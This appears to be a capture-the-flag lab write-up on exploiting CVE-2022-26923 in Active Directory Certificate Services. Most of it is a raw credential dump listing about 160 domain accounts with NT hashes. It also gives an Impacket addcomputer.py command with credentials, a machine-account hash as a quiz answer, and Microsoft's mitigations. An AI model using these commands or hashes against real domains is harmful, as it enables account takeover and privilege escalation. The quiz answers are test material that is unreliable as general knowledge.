dwilliams1:1372:aad3b435b51404eeaad3b435b51404ee:a3161089386d3a03154a8b11235b38b0:::
mbrown:1373:aad3b435b51404eeaad3b435b51404ee:96b06debdbacd429af8bdf99eda2d123:::
kjones:1374:aad3b435b51404eeaad3b435b51404ee:877337483ff990673279bc5468cff0fb:::
mhutchinson:1375:aad3b435b51404eeaad3b435b51404ee:8dd8c3fd722df75ede0c509560c79de2:::
lsmith1:1376:aad3b435b51404eeaad3b435b51404ee:56874be74bf8c3c2395c1b14dfda79a3:::
dpayne:1377:aad3b435b51404eeaad3b435b51404ee:955448bf4ae1b0b172b14364ad739888:::
echapman:1378:aad3b435b51404eeaad3b435b51404ee:d67304e5ce0cd3776e45223a9195a337:::
sfox:1379:aad3b435b51404eeaad3b435b51404ee:6987248c8755f792ce0ddafe6d48df36:::
nwalker:1380:aad3b435b51404eeaad3b435b51404ee:1dd169a93e260f9c951baa30a62fc0af:::
rmoss:1381:aad3b435b51404eeaad3b435b51404ee:3e5212c8091100a49a917dc2f98aa78c:::
ghart:1382:aad3b435b51404eeaad3b435b51404ee:dcedbeccc73457a4aceb5e1234d57652:::
jbennett:1383:aad3b435b51404eeaad3b435b51404ee:18f3a45f3b515a4a6011cee5f02ced0b:::
acarr:1384:aad3b435b51404eeaad3b435b51404ee:601d46f44fcb0f611dd80e05aeefa9ee:::
ctaylor1:1385:aad3b435b51404eeaad3b435b51404ee:06450ca4629e6b921f491c64e704bf9c:::
mgray:1386:aad3b435b51404eeaad3b435b51404ee:c3f977926cb2c0a37942d4b0ff3358e9:::
dwilson:1387:aad3b435b51404eeaad3b435b51404ee:7c75c0162032fabad1b63e871d6693da:::
jsmith:1388:aad3b435b51404eeaad3b435b51404ee:5ab077a1e2d07943cf30ac1dfb77db0f:::
cthorpe:1389:aad3b435b51404eeaad3b435b51404ee:74f397de5590ab40bd0b2ea4bc7c9471:::
cnicholson:1390:aad3b435b51404eeaad3b435b51404ee:13ca3455ee3eacff2cbd8809e7cb69d6:::
cglover:1391:aad3b435b51404eeaad3b435b51404ee:512568f0040f2b917845bcc9388c91d4:::
rlynch:1392:aad3b435b51404eeaad3b435b51404ee:4300bfbce72328e5675a11c7d567778a:::
aevans:1393:aad3b435b51404eeaad3b435b51404ee:c78eab4e6b18184147a172f896b91105:::
ewall:1394:aad3b435b51404eeaad3b435b51404ee:89e91477b7671c71c67ba7c28e93566e:::
jrice:1395:aad3b435b51404eeaad3b435b51404ee:e66bf50edaa023a67047f44fe82aaf0f:::
jburns:1396:aad3b435b51404eeaad3b435b51404ee:9f867a99073c8ffcbf2d6fe8eef72102:::
pmarshall:1397:aad3b435b51404eeaad3b435b51404ee:0eccb9f2ad414f62a0436eb57d052cde:::
ftaylor:1398:aad3b435b51404eeaad3b435b51404ee:e35a89e4bba803caceb724d5cd13af78:::
djones:1399:aad3b435b51404eeaad3b435b51404ee:44075fce50788b451b5aaa7c9720f0a8:::
rford:1400:aad3b435b51404eeaad3b435b51404ee:fb6023a933c89fc06f710f251d0f5dae:::
hjames:1401:aad3b435b51404eeaad3b435b51404ee:b1ffdbc1fc63d26f8c58443a5897c25d:::
ksmith:1402:aad3b435b51404eeaad3b435b51404ee:31d05cb5b136f7247609f0d3dc5f1f7e:::
jdobson:1403:aad3b435b51404eeaad3b435b51404ee:7a426d1b0121824917fb39054ab3fbe0:::
esmith:1404:aad3b435b51404eeaad3b435b51404ee:47d2c9985b5d846ebc7f82505e23a1a1:::
eroberts:1405:aad3b435b51404eeaad3b435b51404ee:cdd932137584d31d9bf6261c8da76148:::
ewatson:1406:aad3b435b51404eeaad3b435b51404ee:6af86f8ce742a4e72ac7ca774c67776f:::
awhite1:1407:aad3b435b51404eeaad3b435b51404ee:279d6e1834fe2ffdb196c2b2e07f2179:::
ghilton:1408:aad3b435b51404eeaad3b435b51404ee:756f81826c491fdfc66302f0bbb3e6df:::
dmyers:1409:aad3b435b51404eeaad3b435b51404ee:2c2e730f2e5a3523c5492089fac62ee4:::
hjames1:1410:aad3b435b51404eeaad3b435b51404ee:27325377a7206ff1dea640b66b727bd7:::
gowen:1411:aad3b435b51404eeaad3b435b51404ee:071213d9bba91c4cbfdafd89deca422e:::
gmatthews:1412:aad3b435b51404eeaad3b435b51404ee:40b94228dc4eabe4f64cc2818a4cd9b2:::
nstevens:1413:aad3b435b51404eeaad3b435b51404ee:b4f4272575cad7abe475f30916cfc5cb:::
glewis:1414:aad3b435b51404eeaad3b435b51404ee:d20789005bf605a095e8bf46536c2e27:::
bthompson:1415:aad3b435b51404eeaad3b435b51404ee:f382eeda358ecc77495c610ece0fa875:::
jbradley:1416:aad3b435b51404eeaad3b435b51404ee:ea61f49102026e63519cee66d8967478:::
bfrancis:1417:aad3b435b51404eeaad3b435b51404ee:694a6c1bde230d422d573afd1399478c:::
chall1:1418:aad3b435b51404eeaad3b435b51404ee:9db204b7fde34fdd58295ae41b8048ec:::
smoore:1419:aad3b435b51404eeaad3b435b51404ee:bf75b3b06f2db355048a5c07b76ff43e:::
mtaylor:1420:aad3b435b51404eeaad3b435b51404ee:0945b471745d9c48302b6d15374482fc:::
sholloway:1421:aad3b435b51404eeaad3b435b51404ee:633c84c8004e0d80334f9edaf834ab10:::
sa-sholloway:1422:aad3b435b51404eeaad3b435b51404ee:b9c0026b8c816fc24d084ef640b3a8c3:::
tsmith:1423:aad3b435b51404eeaad3b435b51404ee:e4124c37ea7aed6af56221568029841e:::
kwalker:1424:aad3b435b51404eeaad3b435b51404ee:714825474d97a1f6466898eb1b7d0ad0:::
nhudson:1425:aad3b435b51404eeaad3b435b51404ee:6123cefa5c360a9224282325d6122967:::
ajackson1:1426:aad3b435b51404eeaad3b435b51404ee:f568032dd42ef4d22274279af2c29db8:::
mgray1:1427:aad3b435b51404eeaad3b435b51404ee:903d63564b16c4c54413af842e1f07d9:::
bsmith:1428:aad3b435b51404eeaad3b435b51404ee:1a0d83b37994ac71b3645a925c18337d:::
kward:1429:aad3b435b51404eeaad3b435b51404ee:aaa2f7d1ea7028907e6bfc0b960c68f3:::
jchapman3:1430:aad3b435b51404eeaad3b435b51404ee:c388d5891abd61abe20c6bdcdce1fe82:::
bsavage:1431:aad3b435b51404eeaad3b435b51404ee:7a1ab6c424acd5ba59a25910fadfda12:::
sa-bsavage:1432:aad3b435b51404eeaad3b435b51404ee:425b652e6b8ba4c64d0b97db56ea1b2d:::
mpayne:1433:aad3b435b51404eeaad3b435b51404ee:888220ed48f040c1a35ffe911ffdda70:::
mking:1434:aad3b435b51404eeaad3b435b51404ee:9d3534788ea75730e7c4cdaf86321acc:::
ggibbs:1435:aad3b435b51404eeaad3b435b51404ee:dc8ef2ac50a516370de5f6924833591b:::
mrichards:1436:aad3b435b51404eeaad3b435b51404ee:e5810a1309d9f330c216e4c94f29484f:::
msingh:1437:aad3b435b51404eeaad3b435b51404ee:5aa85e238f07e98a9bb210a75df48a41:::
dbrown1:1438:aad3b435b51404eeaad3b435b51404ee:b2acb49f357b4de204732576f5eb4be7:::
jsmith1:1439:aad3b435b51404eeaad3b435b51404ee:bdf93234a715b2a378bded20798363b2:::
dmitchell:1440:aad3b435b51404eeaad3b435b51404ee:f329519e4030e23d6b559e0c60580993:::
gsmith:1441:aad3b435b51404eeaad3b435b51404ee:1b9c2b4914e1fc2ed07bf03471fc510a:::
lrichardson:1442:aad3b435b51404eeaad3b435b51404ee:25dbbc4e7f4e3e7de5f81a078c18418b:::
earmstrong:1443:aad3b435b51404eeaad3b435b51404ee:ec5921ba5503064481161b6a689169c0:::
caustin:1444:aad3b435b51404eeaad3b435b51404ee:a5cc6db7b94eba84b53db2df5365886f:::
jbarber:1445:aad3b435b51404eeaad3b435b51404ee:d125ccbe3173a861a001135cf8b14002:::
sbell:1446:aad3b435b51404eeaad3b435b51404ee:f9aad93c75b56054aae600980811d6f9:::
amorgan:1447:aad3b435b51404eeaad3b435b51404ee:d88ec7f80e5f70182864d88575bf1a16:::
bweston:1448:aad3b435b51404eeaad3b435b51404ee:32ad3958570387befaa9cae85249150b:::
mgriffiths:1449:aad3b435b51404eeaad3b435b51404ee:115802c867270c28f04815475c2ebdfb:::
staylor1:1450:aad3b435b51404eeaad3b435b51404ee:8d4891605a6ef591e4c4135da5d41edb:::
apatel:1451:aad3b435b51404eeaad3b435b51404ee:4d6676cee61cbdecb341e4ff4a12d147:::
jwilson1:1452:aad3b435b51404eeaad3b435b51404ee:361ea954ad0f3af44e67010c0249a70b:::
kprice:1453:aad3b435b51404eeaad3b435b51404ee:5fd8582de415793d46345accf46b4e57:::
lbarnes:1454:aad3b435b51404eeaad3b435b51404ee:138373b6fb2bebc6f7ddf562edc01363:::
agriffiths:1455:aad3b435b51404eeaad3b435b51404ee:6dbc69ddcd78876dbeba47fe545e89b3:::
dosullivan:1456:aad3b435b51404eeaad3b435b51404ee:45f7b9e54346177d14ece141d40c8f1f:::
swalters:1457:aad3b435b51404eeaad3b435b51404ee:50e89044e9a3e976cedee17a2a0b02c3:::
adunn:1458:aad3b435b51404eeaad3b435b51404ee:51d41e8e43f8b983ff58616c6a534a4b:::
cwilliams:1459:aad3b435b51404eeaad3b435b51404ee:0aa5aae8fa8c68ca8fecd8e301dd3243:::
bhall:1460:aad3b435b51404eeaad3b435b51404ee:a8bf680945e09d728ba828e0f1dd780a:::
smason:1461:aad3b435b51404eeaad3b435b51404ee:e806cb628f155890c8c8ee86f81e9775:::
mbarker:1462:aad3b435b51404eeaad3b435b51404ee:859e7cbc6c98a9bdfc2e2d77e28eda71:::
kwatkins:1463:aad3b435b51404eeaad3b435b51404ee:0bbe816222cb0cfed6fccd53c3cf28d5:::
ataylor:1464:aad3b435b51404eeaad3b435b51404ee:e0006b078ef23c4b9b1113f98175b0d6:::
kevans:1465:aad3b435b51404eeaad3b435b51404ee:c85e2ce58f1e70d55e8d9da5bf00bf5e:::
hpratt:1466:aad3b435b51404eeaad3b435b51404ee:6026e68d2ceab699ec25c9a035fa3c06:::
jbanks:1467:aad3b435b51404eeaad3b435b51404ee:1a7134ec4a626bb04b55840618d9c64d:::
dcook:1468:aad3b435b51404eeaad3b435b51404ee:5bc111d36a45f9a95f0761349c681899:::
gfrancis:1469:aad3b435b51404eeaad3b435b51404ee:f2a50a77509b67fc0ac68a59941940d3:::
jmartin:1470:aad3b435b51404eeaad3b435b51404ee:ee804f6b79da0700cf083128b4b35f42:::
dhunter:1471:aad3b435b51404eeaad3b435b51404ee:b09d71acc0654e4ea1374897249e7725:::
lroberts:1472:aad3b435b51404eeaad3b435b51404ee:978d65d94dd7c06b499be0a7f9ffd36a:::
krobinson1:1473:aad3b435b51404eeaad3b435b51404ee:8390107c04a7aa5bdbaa8008cd0fb572:::
jrees:1474:aad3b435b51404eeaad3b435b51404ee:52581dcbfc9b6646ed4f6aa98de09abb:::
rhunter:1475:aad3b435b51404eeaad3b435b51404ee:c605ce52a3e549377a42c24f1cd8990c:::
fmarsh:1476:aad3b435b51404eeaad3b435b51404ee:80e4d9a2740a746535cfc36e94830241:::
dhunt:1477:aad3b435b51404eeaad3b435b51404ee:8e85edfe90ac9a579faacc2f54fd64a9:::
ltaylor:1478:aad3b435b51404eeaad3b435b51404ee:092a36badfa7853c1f8d0297429cc71c:::
gmyers:1479:aad3b435b51404eeaad3b435b51404ee:aaebd0289cf8aec6a049f774d261f298:::
jellis:1480:aad3b435b51404eeaad3b435b51404ee:a6e8eef605ebb77a216e9a85473beb2a:::
lpratt:1481:aad3b435b51404eeaad3b435b51404ee:d2bd08b72d0a6686331e68d11b0c9a84:::
mwilson:1482:aad3b435b51404eeaad3b435b51404ee:cc32fa2d23962af094ec23e1db4212bd:::
rwood:1483:aad3b435b51404eeaad3b435b51404ee:cb580c79143370712193c65ef92b4e20:::
jcarroll:1484:aad3b435b51404eeaad3b435b51404ee:b913a8c2947acde5933fb9430f066ec4:::
lpage:1485:aad3b435b51404eeaad3b435b51404ee:8a7b8d8535cdb6345e5421cb235dc5d7:::
aburton:1486:aad3b435b51404eeaad3b435b51404ee:a93436cc78f166781c548176c3242c57:::
cwoods:1487:aad3b435b51404eeaad3b435b51404ee:c1d51c562335ba7272839771172cf2dd:::
mjames:1488:aad3b435b51404eeaad3b435b51404ee:0e514d40fb17e6f467b958f0c26b2311:::
dduncan:1489:aad3b435b51404eeaad3b435b51404ee:e666dea1e26f4ad69e3852189523221c:::
adavis:1490:aad3b435b51404eeaad3b435b51404ee:ea9e1dd3a0ffb64fc8de4b7be57d5e31:::
mdavies:1491:aad3b435b51404eeaad3b435b51404ee:2c813e29ea943c51e265d00e1157de46:::
ljones1:1492:aad3b435b51404eeaad3b435b51404ee:c23440e7c811ce9e47ee6b8500965f91:::
jabbott:1493:aad3b435b51404eeaad3b435b51404ee:a0fc6fb2b9b53e5f870cc59a6f5b9d88:::
skent:1494:aad3b435b51404eeaad3b435b51404ee:5e4a4001aada30938dea6f4e94d2793d:::
jbutler:1495:aad3b435b51404eeaad3b435b51404ee:203c95867dfcb77a62093f72259dd95c:::
janderson:1496:aad3b435b51404eeaad3b435b51404ee:b7ae8a03272aa62b2c63f56465532d0c:::
jrichards:1497:aad3b435b51404eeaad3b435b51404ee:79fb25bf9c718984f54a5803b793d3af:::
lwarren:1498:aad3b435b51404eeaad3b435b51404ee:9a0691ab0ed58c6baa516b5405af3149:::
jgray:1499:aad3b435b51404eeaad3b435b51404ee:eff2bba5b8ac57f55e2544939db15f57:::
darmstrong:1500:aad3b435b51404eeaad3b435b51404ee:d20da8f8be64277370dd5221e3f623e0:::
sbrown:1501:aad3b435b51404eeaad3b435b51404ee:d2a1193dfbc6e41a494b3c783f25ed07:::
jwilliams:1502:aad3b435b51404eeaad3b435b51404ee:9a22c174bd003e6990ea3a2fa4f4b382:::
ccampbell:1503:aad3b435b51404eeaad3b435b51404ee:fd2dc4573a8364c8e19d344ee4129d17:::
lbird:1504:aad3b435b51404eeaad3b435b51404ee:bf34fac468503f29b087e351ba8d4f41:::
jhill1:1505:aad3b435b51404eeaad3b435b51404ee:1730832df45fab1da63f67fde792d723:::
mdavies1:1506:aad3b435b51404eeaad3b435b51404ee:1d9dd11a9ffbc6c1ffe69a57275deea5:::
estephenson:1507:aad3b435b51404eeaad3b435b51404ee:a63358d41a2959781199848358c6394c:::
swong:1508:aad3b435b51404eeaad3b435b51404ee:a2750b8bd13cae657e05ce5452ae1a59:::
cabbott:1509:aad3b435b51404eeaad3b435b51404ee:2c562623ff7d748022c819953f0f62d0:::
rholland:1510:aad3b435b51404eeaad3b435b51404ee:b7da1b02d7b74aad58cbb8ec11819ed3:::
bevans:1511:aad3b435b51404eeaad3b435b51404ee:1f801adf158af48ae7838220f6a23a58:::
jpowell:1512:aad3b435b51404eeaad3b435b51404ee:ed6ca7ecfcbca47aa008c52813423145:::
wrobinson:1513:aad3b435b51404eeaad3b435b51404ee:877fe0f38c637193e4834e7b8e149f00:::
athomas:1514:aad3b435b51404eeaad3b435b51404ee:f6d36b0b88b8985b128ee08fd4033dd2:::
madams:1515:aad3b435b51404eeaad3b435b51404ee:1d0700f6896cf79015b65e4db0ecfd1d:::
rcooper:1516:aad3b435b51404eeaad3b435b51404ee:14f561763ace781f6a0b5a6b5240297c:::
oreed:1517:aad3b435b51404eeaad3b435b51404ee:4a3f35c6af61ca28287baaaeba4df19e:::
ctaylor2:1518:aad3b435b51404eeaad3b435b51404ee:a510b3949a790bf8d6b9eaf0bdd7127b:::
kparker:1519:aad3b435b51404eeaad3b435b51404ee:0c90610e4a584bbc9a2e8719e56f71b2:::
kdean:1520:aad3b435b51404eeaad3b435b51404ee:26c9ebd0fbad1dcefacf706aa2d7a9ba:::
awilliams:1521:aad3b435b51404eeaad3b435b51404ee:94ce7e80299f951f2b40823990ace6e2:::
bburrows:1522:aad3b435b51404eeaad3b435b51404ee:3a3db268c288488dc3c099d9654eabfe:::
mtaylor1:1523:aad3b435b51404eeaad3b435b51404ee:a9887066fbde06aa4107a3428990aa64:::
gkirby:1524:aad3b435b51404eeaad3b435b51404ee:760feb6798e1283a5192efa7a257c9d8:::
jgray1:1525:aad3b435b51404eeaad3b435b51404ee:cc1c21de6e32a86ceb51729394eb9680:::
kweston:1526:aad3b435b51404eeaad3b435b51404ee:8bf58c4e8de8562f5d6c95ca92bd171c:::
esharpe:1527:aad3b435b51404eeaad3b435b51404ee:806ab0c746099c78cbb0e9dbe730221c:::
lrobinson:1528:aad3b435b51404eeaad3b435b51404ee:52238d93c9bd35a8db15886ec9ce5d1f:::
mwebb:1529:aad3b435b51404eeaad3b435b51404ee:73a309d1687f1c6878d0fcc772229b7c:::
acrawford:1530:aad3b435b51404eeaad3b435b51404ee:c767584824c01d4b5eacdd250a99665d:::
delliott:1531:aad3b435b51404eeaad3b435b51404ee:f00744725284433af7cc920432ebb089:::
[-] [Errno 104] Connection reset by peer
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up... 


What is the syntax of the command to use Impacket's addcomputer.py to add a new computer to the lunar.eruca.com domain using the AD credentials of test:pass, with the LDAPS method, with the hostname of thmtest, and the password of computer1?

addcomputer.py 'domain/username:password' -method <method> -computer-name '<computer name>' -computer-pass '<computer pass>'

*addcomputer.py 'lunar.eruca.com/test:pass' -method LDAPS -computer-name 'thmtest' -computer-pass 'computer1'*

What is the NT hash of the LUNDC machine account?

14fc9b5814def64289bb694f6659c733

Mitigations and Fixes

To defend against CVE-2022-26923, the best course of action is to apply the patch released by Microsoft:

  1. A new Object ID (OID) was introduced in new certificates to further fingerprint the user. This is done by embedding the user's objectSid within the new szOID_NTDS_CA_SECURITY_EXT OID.

  2. The "Validated write to DNS hostname" permission now only allows you to set the DNSHostname to an attribute matching the SAM Account Name or the computer account, meaning it can't be used to spoof the account name of other hosts.

Together with this, there are a few other security measures that you can take:

  • Make sure that your certificate templates are restricted. Only allow Machine and User automatic enrollment if it is required. Otherwise, through security configuration, the permissions for these templates can be reduced.

  • If there is no business case for allowing users to enrol hosts onto AD, change the MS-DS-Machine-Account-Quota attribute to 0 on all accounts that should not have the ability to enrol new hosts. This will not resolve the issue, however, since an attacker only has to gain administrative access over a single domain-joined host to be able to perform a certificate request.

Answer the questions below

Read the above.

Completed

Conclusion

That's a wrap!

In this room, we showed a possible method to exploit CVE-2022-26923. As mentioned previously, this is one of the new CVEs that came to light in Microsoft's AD Certificate Service. There are other issues, such as toxic parameter combinations that are not even classified as CVEs that can be used for privilege escalation. Have a read through the SpecterOps whitepaper if you are interested in learning more.

If you're interested in other rooms on recent exploits, they can be found in the Recent Threats Module.

Answer the questions below

Read the above.

Completed

[[Cyber Scotland 2021]]

Last updated